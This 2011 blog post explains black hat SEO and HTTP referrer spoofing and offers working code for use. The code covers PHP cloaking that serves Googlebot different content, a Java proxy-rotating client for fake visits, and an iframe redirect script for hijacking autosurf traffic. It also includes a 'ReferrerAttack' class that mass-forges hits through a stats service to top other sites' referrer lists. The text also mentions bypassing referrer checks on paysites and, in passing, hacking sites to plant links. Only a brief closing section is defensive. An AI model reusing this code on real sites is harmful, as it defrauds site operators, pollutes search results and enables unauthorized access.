
HTTP Spoofing and Cloaking - Black Hat SEO

Friday, July 22, 2011

Introduction

As mentioned previously in this post, Search Engine Optimization (SEO) is the process of improving your Web site so it appears higher in the organic, natural, unpaid results of search engines. The varying techniques used for SEO can be lumped into two main categories: White Hat SEO and Black Hat SEO.

Both practices share the same goal: bringing a website to the highest possible organic position. However, as their names suggest, White Hat SEO techniques are safe, reliable, and accepted by search engines, while Black Hat SEO techniques rely on methods such as link farms, keyword stuffing, and article spinning that degrade the relevance of search results. Search engines look for sites that employ these techniques in order to remove them from their indices.

If you hire a company that uses Black Hat SEO techniques, it is very possible your site will get banned from Google. For anyone who is interested, here is a list of techniques I retrieved from [2]:
  1. Hidden text

    Hidden text is textual content in a web page that visitors cannot see but that is still readable by search engines. Its main purpose is to load a page with keywords and keyword phrases that remain invisible to visitors but help improve the page's rankings in the search engine results. Hidden text is considered search spam by all of the major search engines, since it presents information to search engines differently than to visitors.

    Text can be hidden in numerous ways (a short sketch follows this list), including:
    • Using white text on a white background
    • Placing text behind an image
    • Using CSS to hide text, e.g. in layers that are legitimately hidden for usability reasons, such as CSS pagination
    • Reducing the font size to 0
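
    A small illustrative sketch (hypothetical markup, not taken from any real site) combining two of the methods above, a display:none block and white-on-white text with zero font size:
    <?php
      // Keyword phrase that visitors should not see but crawlers will read
      $stuffed = 'cheap hotels cheap flights rehab clinics';
    ?>
    <p>Normal page copy that visitors actually read.</p>
    <div style="display:none"><?php echo $stuffed; ?></div>
    <span style="color:#fff; background:#fff; font-size:0">
      <?php echo $stuffed; ?>
    </span>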

  2. Throw Away Domains

    Throwaway domains are domains created to redirect traffic to other, longer-lived domains. They are designed to be used for only a few days and then discarded by the time spam filters begin to recognize them. The trick consists of creating exact-match microsites for short-term popular keywords, something like wikipediahotelsrehab.com.

  3. Donation links

    Donate to charities, software developers, etc. Many of them display links to those who donate.

  4. Keyword stuffing

    Tags and folksonomy. Keyword-stuff by adding several tags yourself, or let your users do the dirty work via UGC tagging (folksonomy); every major social site does that.

  5. Automatically generated keyword pages

    Some shopping search engines create pages from each Google search query and assign the appropriate products to each query. You can do that as well if you have enough content.
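
    A rough sketch of the idea (the script name, database table and credentials are all hypothetical): a single script turns an incoming search phrase into its own indexable page listing the matching products.
    <?php
      // Hypothetical keyword-page generator:
      // /search.php?q=red+running+shoes becomes its own page.
      $q  = isset($_GET['q']) ? trim($_GET['q']) : '';
      $db = new PDO('mysql:host=localhost;dbname=shop', 'user', 'pass');
      $stmt = $db->prepare(
        'SELECT name, url FROM products WHERE name LIKE ? LIMIT 20');
      $stmt->execute(array('%' . $q . '%'));
      echo '<h1>' . htmlspecialchars($q) . '</h1>';
      foreach ($stmt as $row) {
        echo '<p><a href="' . htmlspecialchars($row['url']) . '">'
           . htmlspecialchars($row['name']) . '</a></p>';
      }
    ?>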

  6. Misspellings

    When choosing your keywords you most likely use the correct spelling so your website looks more professional. But did you know misspelling keywords on purpose can also help with your SEO campaign?

    Try different misspellings in the Google AdWords Keyword Tool, and see which ones are searched almost as much as the real spelling. For example, the word “jewellery” is a hard one to spell correctly, and search volumes prove this. By searching for “jewellry”, you will find the search volume is just as big as it is for the correct spelling. Optionally, you can redirect the misspelled version to the correct one.

  7. Scraping

    Create mirrors for popular sites. Offer them to the respective webmasters. Most will be glad to pay less.

  8. Ad only pages

    Create full-page ads (interstitials) and show them before users see the content, like many old-media sites do.

  9. Blog spam

    Don’t spam yourself! Create posts about very profitable keywords and let spammers do the job for you. Then all you need to do is keep the comments containing your keyword and remove all the outgoing links. User-generated content from bots, so to say.

  10. Duplicate content on multiple domains

    Offer your content under a Creative Commons license with attribution.

  11. Domain grabbing

    Buy old authority domains that failed and revive them instead of putting them on sale.

  12. Fake news

    Create real news on official-looking sites for real events. You can even do it in print. Works great for all kinds of activism-related topics.

  13. Link farm

    Create a legit blog network of flagship blogs. A full-time pro blogger can manage three to five high-quality blogs by him- or herself.

  14. New exploits

    Find them and report them; blog about them. You break the story and thus get all the attention and links.

  15. Brand jacking

    Write a bad review for a brand that has disappointed you, or set up a “brand X sucks” page and let consumers voice their concerns.

  16. Rogue bots

    Spider websites and make their webmasters aware of broken links and other issues. Some people may be thankful enough to link to you.

  17. Hidden affiliate links

    In fact, hiding affiliate links is good for usability and can be even more ethical than showing them: example.com/ref?id=87233683 is far worse than just example.com. Also, unsuspecting web users will copy your ad to forums etc., which might break their TOS. The only thing you have to do is disclose the affiliate link as such. I prefer to use [ad] (on Twitter, for example) or [partner-link] elsewhere. This way you can strip the annoying “ref” IDs and achieve full disclosure at the same time.
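
    As a minimal sketch of the clean-link approach (the go.php file name and merchant URL are made up), a tiny redirect script on your own domain keeps the visible link short while the "ref" id stays server-side:
    <?php
      // Hypothetical go.php: visitors see example.com/go.php?to=hosting,
      // while the ugly affiliate URL is kept on the server.
      $partners = array(
        'hosting' => 'http://www.merchant-example.com/ref?id=87233683',
      );
      $key = isset($_GET['to']) ? $_GET['to'] : '';
      if (isset($partners[$key])) {
        header('HTTP/1.1 302 Found');
        header('Location: ' . $partners[$key]);
      }
      else {
        header('HTTP/1.1 404 Not Found');
      }
      exit;
    ?>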

  18. Doorway pages

    Effectively, doorway pages could also be called landing pages. The only difference is that doorway pages are worthless crap while landing pages are streamlined to suffice on their own. Common to both is that they are highly optimized for organic search traffic. So instead of making your doorway pages just a place to get skipped, optimize them as landing pages and make users convert right there.

  19. Multiple subdomains

    Multiple subdomains for one domain can serve an ethical purpose. Just think of blogspot.com or wordpress.com – they create multiple subdomains through UGC. This way they can rank several times for a query. You can offer subdomains to your users as well.

  20. Social media automation

    There is nothing wrong with automating posts on Twitter, Facebook or any other social media service, as long as you don't overdo it. Scheduling and repeating posts is perfectly OK if a real person is attending the account and also produces content. Bot accounts can be ethical as well, in case they are useful not only for yourself. A bot collecting news about Haiti in the aftermath of the earthquake would be perfectly legit, if you ask me.

  21. Deceptive headlines

    Tabloids use them all the time, and black hat SEOs do too. There are ethical use cases for deceptive headlines, though: satire, of course, and simple humor. For instance, I could end this list with 24 items and declare the post a list of 300 items anyway. That would be a good laugh. I’ve done that in the past, but in a more humorous post.

  22. Google Bowling

    This practice began when Google started penalizing sites that acquire lots of incoming links in a very short period. Unscrupulous webmasters realized that this could be used against competitor sites by pointing such links at them instead of at their own site. Google claims to have measures in place to prevent this practice from unfairly damaging a site's PageRank; however, this is clearly not true.

  23. Invisible links

    We all use them! Most free web counters and statistics tools rely on them, so when you embed one of those on your site you are using invisible links.
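
    For illustration only (the counter URLs are invented), this is the kind of markup a free hit counter typically asks you to paste into your pages: a link wrapped around a 1x1 image that no visitor will ever notice.
    <?php
      // Hypothetical embed code for a free web counter: an invisible
      // link around a 1x1 tracking pixel.
      echo '<a href="http://counter.example.com/stats?id=12345">'
         . '<img src="http://counter.example.com/c.gif" '
         . 'width="1" height="1" alt="" style="border:0" /></a>';
    ?>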

  24. Different content for search engines than users

    Do you use WordPress? Then you have the nofollow attribute added to your comment links. This way the search engine gets different content than the user: we can see the link and click on it, but for a search bot it is a no-trespassing sign. In white hat SEO this is often called PageRank sculpting. Most social media add-ons do it by default.
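
    A one-line illustration (the commenter URL is made up) of what that no-trespassing sign looks like in the generated markup:
    <?php
      // The visitor sees and can click a normal link; the rel="nofollow"
      // attribute only changes how search engine bots treat it.
      echo '<a href="http://www.commenter-example.com" rel="nofollow">'
         . 'commenter name</a>';
    ?>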

  25. Hacking sites

    You can always hack a website and add a few links to some old post. If you are smart enough, then no one will ever notice it.

  26. Slander linkbait

    Pulling a Calacanis-like “SEO is bullshit” is quite common these days. Why not do it the other way around? The anti-SEO angle doesn't work that well anymore unless you are as famous as Robert Scoble. In contrast, a post dealing with “100 Reasons to Love SEO Experts” might strike a chord by now.

  27. Map spam

    Instead of faking multiple addresses all over the place just to appear on Google Maps and Local, why don't you simply create an affiliate network of real-life small business owners with shops and offices who, for a small amount of money, act as your representatives there? All they need to do is collect your mail from Google and potential clients.

  28. 301 redirects

    Redirect outdated pages to their newer versions or to your homepage. When moving to a new domain, use them as well, of course.
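
    A minimal sketch of such a redirect map (the paths and domain are made up):
    <?php
      // Map outdated URLs to their newer versions; anything unknown
      // falls back to the homepage.
      $moved = array(
        '/old-post.html'  => '/new-post.html',
        '/2009/promo.php' => '/',
      );
      $path   = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH);
      $target = isset($moved[$path]) ? $moved[$path] : '/';
      header('HTTP/1.1 301 Moved Permanently');
      header('Location: http://www.yoursite.com' . $target);
      exit;
    ?>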

  29. HTTP Cloaking

    Cloaking involves using the IP address (also called IP delivery) or features of the HTTP request (e.g. the User-Agent field) to identify and deliver unique content to a specific IP or user agent. IP delivery is usually employed to offer the proper localized content to visitors coming from a country-specific IP address.

    A basic example (that doesn't include a location check) is:
    <?php
      $ips = array('1.1.1.1', '2.2.2.2'); // list of IPs to cloak
      $ip  = $_SERVER['REMOTE_ADDR'];     // the visitor's IP address
      if (in_array($ip, $ips)) {
        header('HTTP/1.1 301 Moved Permanently');
        header('Location: http://www.site-two.com');
        exit;
      }
      else {
        header('Content-Type: text/html; charset=utf-8');
        // Show site one here
      }
    ?>
    
    User-agent Cloaking is another method for delivering different sets of content to different users or spiders.
    <?php
      if (strstr($_SERVER['HTTP_USER_AGENT'], 'Googlebot')) {
        header('HTTP/1.1 301 Moved Permanently');
        header('Location: http://www.site-two.com');
        exit;
      }
      else {
        header('Content-Type: text/html; charset=utf-8');
        // Show site one here
      }
    ?>
    
    Note that by using cloaking you can hide the heavy Flash animations from Google, showing the text-only version optimized for accessibility and findability.

Now that we have covered the most basic Black Hat SEO techniques, let's move on to a slightly different topic: HTTP spoofing techniques.

Referrer spoofing techniques


In the context of network security, a spoofing attack is a situation in which one person or program successfully masquerades as another by falsifying data, thereby gaining an illegitimate advantage [1]. Referrer spoofing is a specific type of spoofing attack. For example, some websites, especially pornographic paysites, allow access to their materials only from certain approved (login) pages. This is enforced by checking the referrer header of the HTTP request. This referrer header, however, can be changed (known as "referrer spoofing" or "Ref-tar spoofing"), allowing users to gain unauthorized access to the materials (e.g. see this old post).
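
A minimal sketch (assuming PHP with the cURL extension; the paysite URLs are made up) showing that the Referer header is entirely under the client's control:
<?php
  // Claim to arrive from the approved login page, even though we don't.
  $ch = curl_init('http://www.paysite-example.com/members/image001.jpg');
  curl_setopt($ch, CURLOPT_REFERER,
              'http://www.paysite-example.com/login.php');
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  $content = curl_exec($ch);
  curl_close($ch);
?>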

Manipulating web traffic


As I mentioned in my previous post, some of these techniques can be combined to get free traffic. All you need to do is send spoofed traffic to specific websites (especially websites that display a top-referrers list). Once you reach the top of that list, you will start receiving natural traffic for free. Of course, if your website has no link to that website, the situation looks suspicious!

There are several ways to send traffic to a website:

  • Traffic exchange

    The traffic is real and comes from your website. This is the honest way of doing it. However, it requires you to already have a huge number of visitors.

  • Fake visitors

    This is the cheapest and fastest way of getting free traffic; however, it doesn't always work. The only thing you need is an application that can establish an HTTP connection to the website using a spoofed referrer. For that you can use a very old library I developed a long time ago, which is now available on Google Code. It's quite easy to use and includes a cookies manager, connections through several proxies, etc.
    /**
     * This class defines a list of proxies, e.g. when you want
     * to route your connections through them.
     */
    ProxyManager proxy = new ProxyManager();
    
    /** 
     * Add as many as you want, it will iterate them
     */
    proxy.add("proxy.domain.com", 3128);
    
    /** Activate this ProxySelector */
    proxy.install();
    
    /** If you need cookies for your connection */
    Cookies cookies = new Cookies();
    
    /** Setup the HTTP client  */
    NetworkClient network = new NetworkClient(cookies);
    
    /** or use defaults */
    network = new NetworkClient();
    
    /** Setup the HTTP client headers */
    network.setUserAgent("Mozilla/3.0 (Indy Library)");
    network.setReferer("http://www.yourwebsite.com");
    Logging logger = network.getLogging();
    
    /** Perform the GET request (repeat it to simulate several visits) */
    String result = network.request("http://www.target.com");
    if ( result != null && !result.isEmpty() )
      logger.add(Level.FINE, NetworkClientTest.class, result);
    else
      logger.add(Level.SEVERE, NetworkClientTest.class, 
                                         "Couldn't connect!");
    
    /** 
     * If you need to go back to the previous ProxySelector.
     */
    proxy.uninstall();
    

    This flaw can only be exploited if the website doesn't track IPs. You should also be careful if you don't want your website to be associated with unwanted websites.

  • Redirect and spoof specific traffic sources.

    Assuming the target website(s) do not check whether they are being displayed inside a frame (note that this check can also be used against you), you can display your page to your users and, at the same time, exchange traffic with several sites! Inattentive users will never notice it. So it has multiple benefits: the user visits your website, and your website's standing increases on several websites at the same time. Of course, you can always improve this method with a rotation mechanism that gives more priority to the websites where you rank lower.

    The following example redirects traffic coming from PTC and autosurf programs to our target websites by using just one frame. However, you can adapt the code to display your website as well as the other target sites.
    <?php 
      $referer  = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
      $hostname = 'http://www.think-techie.com';
      if (strpos($referer, 'autosurf') !== false) {
         $links = array('http://www.site-one.com',
                        'http://www.site-two.com');
         $idx = rand(0, count($links) - 1);
    ?>
    
    <html>
    <head>
    <meta http-equiv="Content-Type" 
          content="text/html; charset=utf-8">
    
    <script type="text/javascript">
      var ref;
      ref = document.referrer;
      window.location.href = '<?php echo $links[$idx]; ?>';
    </script>
    
    </head>
    <body>
    <iframe src ="<?php echo $hostname; ?>" 
            width="100%" height="100%">
      <p>Your browser does not support iframes.</p>
    </iframe>
    </body>
    </html>
    
    <?php
      }
      else {
        header ('HTTP/1.1 301 Moved Permanently');
        header ('Location: ' . $hostname);
      }
    ?>
    

  • Exploit services.

    The easiest way of getting free traffic is by exploiting service flaws. Some of the most widely used services that provide visitor statistics can be exploited in order to display your website on their lists.
    /** The site you want to promote */
    private final String yourWebsite;
    
    /** The service you want to exploit */
    private final String flawService;
    
    /** Your niche keywords */
    private final String [] keywords;
    
    /** HTTP connection handler */
    private NetworkClient network;
    
    /** Default constructor */
    public ReferrerAttack(
                             String yourWebsite, 
                             String flawService,
                             String [] keywords)
    {
      this.yourWebsite = yourWebsite;
      this.flawService = flawService;
      this.keywords = keywords;
     
      /** setup HTTP connection headers */
      network = new NetworkClient();
      network.setUserAgent("Mozilla/3.0 (Indy Library)");
      network.setReferer("http://" + yourWebsite);
    }
    
    public void start() {
      Logging log = network.getLogging();
      log.add(Level.INFO, this.getClass(), 
                           "Searching for possible targets ...");
      ArrayList<String> results = search(-1);
     
      log.add(Level.INFO, this.getClass(), 
                           "Selecting similar targets ...");
      ArrayList<Target> targets = filter(results);
     
      log.add(Level.INFO, this.getClass(), 
                          "Performing attack ..."); 
      attack(targets, 1000);
     
      log.add(Level.INFO, this.getClass(), 
                          "Checking for results ...");
      checker(targets);
    }
    
    /**
     * Search websites having outgoing links to this service 
     * @param limit Limit the number of results
     * @return Return a list a possible targets
     */
    public ArrayList<String> search(int limit) {
      ArrayList<String> targets = new ArrayList<String>();
     
      /** Do not look beyond the first 50 results (5 pages of 10) */
      for (int i = 0; i < 50; i += 10) {
        String google="http://www.google.com/search?q=link%3A" +
                          flawService + "&start=" + i;
        String out = network.request(google);
        String regex="<h3 class([^>]+)><a href([^hH]+)([^\"]+)";
        Pattern p = Pattern.compile(regex, Pattern.MULTILINE);
        Matcher m = p.matcher(out);
        while (m.find()) {
          try {
             if (limit > 0 && targets.size() >= limit)
               return targets;
    
               String url = m.group(3);
               URL r = new URL(url);
               url = r.getProtocol() + "://" + r.getAuthority();
               if (!targets.contains(url))
                 targets.add(url);
          }
          catch (MalformedURLException e) {
            e.printStackTrace();
          }
       }
     }
     return targets;
    } 
    
    /**
     * Filter similar sites. So you stay inside of your niche
     * @param targets List of all targets
     * @return Possible good targets
     */
    public ArrayList<Target> filter(ArrayList<String> targets){
     ArrayList<Target> filter = new ArrayList<Target>();
     for(String url : targets){
      String html = network.request(url);
      if(html == null) continue;
      Matcher regx = Pattern.compile("<title>([^<]+)", Pattern.MULTILINE).matcher(html);
    
      String title = "";
      if( regx.find() ) title = regx.group(1);
      
      regx = Pattern.compile("write_ref\\(([\\d]+)\\);", Pattern.MULTILINE).matcher(html);
      if( regx.find() ){
       for(String keyword : keywords){
        String[] tokens = title.split(" ");
        boolean tokenFound = false;
        for(String t : tokens){
         if(t.contains(keyword)){
          tokenFound = true;
          break;
         }
        }
        /** SPAM only sites containing relevant keywords */
        if(url.contains(keyword) || tokenFound)  
         filter.add(new Target(title, url, regx.group(1)));
       }
      }
     }
     return filter;
    }
    
    /**
     * Perform the attack to each of these sites
     * @param targets List of sites
     * @param hits Number of fake visits
     */
    public void attack(ArrayList<Target> targets, int hits){
     Logging log = network.getLogging();
     for (int i = 0; i < targets.size(); i++) {
      Target t = targets.get(i);
      int n = hits;
      String url = t.genAttackURL();
      log.add(Level.INFO, this.getClass(), " + Attacking " +
                                                t.getURL());
      while (n > 0) {
       String text = network.request(url);
       if (text == null) {
        log.add(Level.WARNING, this.getClass(), "Site " + 
                                    url + " is not reachable"); 
        break;
       }
       n--;
      }
      log.add(Level.INFO, this.getClass(), t.getURL()+" [Done]");
     }
    }
    
    /**
     * Check if your site is top referrer for some target
     * @param targets List of target sites
     */
    public void checker(ArrayList<Target> targets){
     for(Target target : targets){
      String content = network.request(target.getURL());
      if (content != null) {
       boolean contains = content.contains(yourWebsite);
       network.getLogging().add(Level.INFO, this.getClass(), "[" + contains + "] " + target.getURL()); 
      }
     } 
    }
    
    /**
     * Object holding the information about a target site
     */
    
    class Target {
     
     private String url, title, uid;
     
     public Target(String title, String url, String uid){
      this.url = url;
      this.title = title;
      this.uid = uid;
     }
     
     public String getURL(){
      return url;
     }
     
     public String getTitle(){
      return title;
     }
     
     public String getUID(){
      return uid;
     }
     
     public String genAttackURL(){
      return "http://" + flawService + "/link.php?e_uid=" + uid
        + "&e_ref=" + yourWebsite + "&e_loc=" + url + "&e_title="
        + title;
     }
    }
    

How to protect your website


If you keep a top-referrers list, make sure that only unique IPs are tracked and ignore users visiting through proxies. Besides that, do not allow your site to be displayed inside iframes. While the following code doesn't protect your website from all possible scenarios, it will at least avoid the most common ones.
<script type="text/javascript">
    if (top.location != self.location)
        top.location = self.location;
</script>
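
On the tracking side, here is a minimal sketch of the unique-IP idea (it assumes a MySQL table named top_referrers with a unique key on the referrer/ip pair; the table and credentials are made up). Each referrer is counted at most once per visiting IP, so a single machine replaying spoofed requests cannot climb the list.
<?php
  // Record a (referrer, ip) pair at most once; INSERT IGNORE relies on a
  // UNIQUE KEY over (referrer, ip) in the hypothetical top_referrers table.
  $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
  if ($referer != '') {
    $host = parse_url($referer, PHP_URL_HOST);
    $db   = new PDO('mysql:host=localhost;dbname=stats', 'user', 'pass');
    $stmt = $db->prepare(
      'INSERT IGNORE INTO top_referrers (referrer, ip) VALUES (?, ?)');
    $stmt->execute(array($host, $_SERVER['REMOTE_ADDR']));
  }
?>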

References


[1] Spoofing attack. Wikipedia.
[2] 30 Black Hat SEO Techniques You Can Use Ethically. http://www.seoptimise.com